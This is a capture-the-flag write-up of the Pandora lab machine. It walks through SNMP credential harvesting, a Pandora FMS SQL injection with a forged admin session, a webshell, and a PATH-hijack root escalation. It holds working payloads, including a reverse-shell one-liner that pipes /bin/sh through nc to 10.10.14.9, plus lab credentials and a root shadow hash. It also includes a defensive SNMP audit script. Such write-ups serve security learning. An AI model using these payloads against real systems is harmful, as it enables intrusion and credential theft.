Basic Information

Port Scan

Ports 22 and 80:

$ nmap -sC -sV 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:33 CST
Nmap scan report for 10.10.11.136
Host is up (0.067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.88 seconds


UDP Port Scan

There is nothing of interest on TCP port 80, so try a UDP scan, which finds SNMP on port 161:

$ sudo nmap -sU -sC -sV 10.10.11.136
Password:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:36 CST
Nmap scan report for 10.10.11.136
Host is up (0.079s latency).
Not shown: 999 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.9:63085
| TCP 10.10.11.136:46700 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 11h38m36s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.136 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:92:25 (VMware)
|_ Type: ethernetCsmacd Speed: 4 Gbps
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
| 17:
| 18:
| 20:
| 21:
| 22:
| 23:
| 24:
| 25:
| 26:
| 27:
| 28:
| 29:
| 30:
| 77:
| 78:
| 79:
|_ 80:
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 11h38m36.31s (4191631 timeticks)
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1036.43 seconds

SNMP

SNMP enumeration reveals a username and password (the process table exposes command-line arguments via hrSWRunParameters, OID 1.3.6.1.2.1.25.4.2.1.5):

perl snmpbw.pl 10.10.11.136 public 2 1
perl snmpprs.pl 10.10.11.136.snmp

snmpwalk -v 2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1.5

-u daniel -p HotelBabylon23
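As an added defender-side check (not part of the original write-up), the following audits the same hrSWRunParameters walk output for passwords passed on a process command line, which is exactly what a readable `public` community hands out. The sample walk and the option spellings in `SECRET_RE` are constructed assumptions.

```python
import re

# Constructed sample of `snmpwalk -v 2c -c public <host> 1.3.6.1.2.1.25.4.2.1.5`
# (HOST-RESOURCES-MIB hrSWRunParameters) output. PIDs and values are made up.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "maybe-ubiquity"
HOST-RESOURCES-MIB::hrSWRunParameters.822 = STRING: "-f /etc/snmp/snmpd.conf -Lsd"
HOST-RESOURCES-MIB::hrSWRunParameters.1117 = STRING: "-u svc_backup -p S3cretExample!"
HOST-RESOURCES-MIB::hrSWRunParameters.1120 = STRING: "--password=AnotherExample --host=db01"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: ""
"""

# One walk line: the process id (OID suffix) and the quoted argument string.
LINE_RE = re.compile(r'hrSWRunParameters\.(\d+)\s*=\s*STRING:\s*"(.*)"$')

# Option spellings that usually carry a secret; this list is an assumption and
# should be extended for the tools actually in use on the audited host.
SECRET_RE = re.compile(
    r'(?:(?:^|\s)-p\s+(\S+))|(?:--?(?:pass(?:word)?|pwd)[=\s]+(\S+))', re.I)


def parse_walk(text):
    """Map pid -> argument string from hrSWRunParameters walk output."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.search(line.strip())
        if m:
            procs[int(m.group(1))] = m.group(2)
    return procs


def find_exposed_secrets(text):
    """Return (pid, redacted_args) for every process whose command line carries
    a password; SNMP exposes that line to anyone holding the community string."""
    findings = []
    for pid, args in parse_walk(text).items():
        m = SECRET_RE.search(args)
        if m:
            secret = m.group(1) or m.group(2)
            findings.append((pid, args.replace(secret, "<redacted>")))
    return findings


if __name__ == "__main__":
    for pid, args in find_exposed_secrets(SAMPLE_WALK):
        print(f"pid {pid}: password on command line: {args}")
```

The fix on the host side is twofold: stop passing secrets as process arguments (use a config file or environment with restricted permissions) and restrict snmpd to SNMPv3 with authentication, or at least a non-default, read-only community bound to trusted sources.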


Log in over SSH with the daniel credentials obtained above:

Information

A pandora_console instance is found listening locally:

Forward it out with SSH and access it; the version is v7.0NG.742_FIX_PERL2020:

ssh -L 8888:localhost:80 daniel@10.10.11.136

Searching turns up two vulnerabilities:

So the two should be chained: SQL injection to get into the admin backend, then upload a PHP webshell.

SQL Injection

According to the article's analysis, the flaw is the session_id parameter in chart_generator.php. The article gives no detailed PoC, so the session table can simply be dumped with sqlmap; that reveals the row structure, from which an admin session's data field is built and injected to forge an admin session:

sqlmap -u http://127.0.0.1:8888/pandora_console/include/chart_generator.php\?session_id\=1 -v 3 -D pandora -T tsessions_php --dump

| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |


http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

SELECT * FROM tsessions_php WHERE `id_session` = '' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO LIMIT 1

Webshell

The admin account has a file upload feature, so upload a webshell:

Reverse Shell & User Flag

http://127.0.0.1:8888/pandora_console/images/shell.php?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.9%204444%20%3E/tmp/f

Privilege Escalation Information

A SUID program calls tar internally without an absolute path:

Privilege Escalation & Root Flag

First write a public key into matt's account and log in over SSH; everything below is done in matt's SSH session:

matt@pandora:/tmp$ mkdir nya
matt@pandora:/tmp$ cd nya
matt@pandora:/tmp/nya$ ls
matt@pandora:/tmp/nya$ echo "/bin/sh" > tar
matt@pandora:/tmp/nya$ chmod +x ./tar
matt@pandora:/tmp/nya$ export PATH=$(pwd):$PATH
matt@pandora:/tmp/nya$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# id
uid=0(root) gid=1000(matt) groups=1000(matt)
# cd /root
# ls
root.txt
# cat root.txt
ebb61c8c6de683f0d5c4778f2ee66826
# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::

References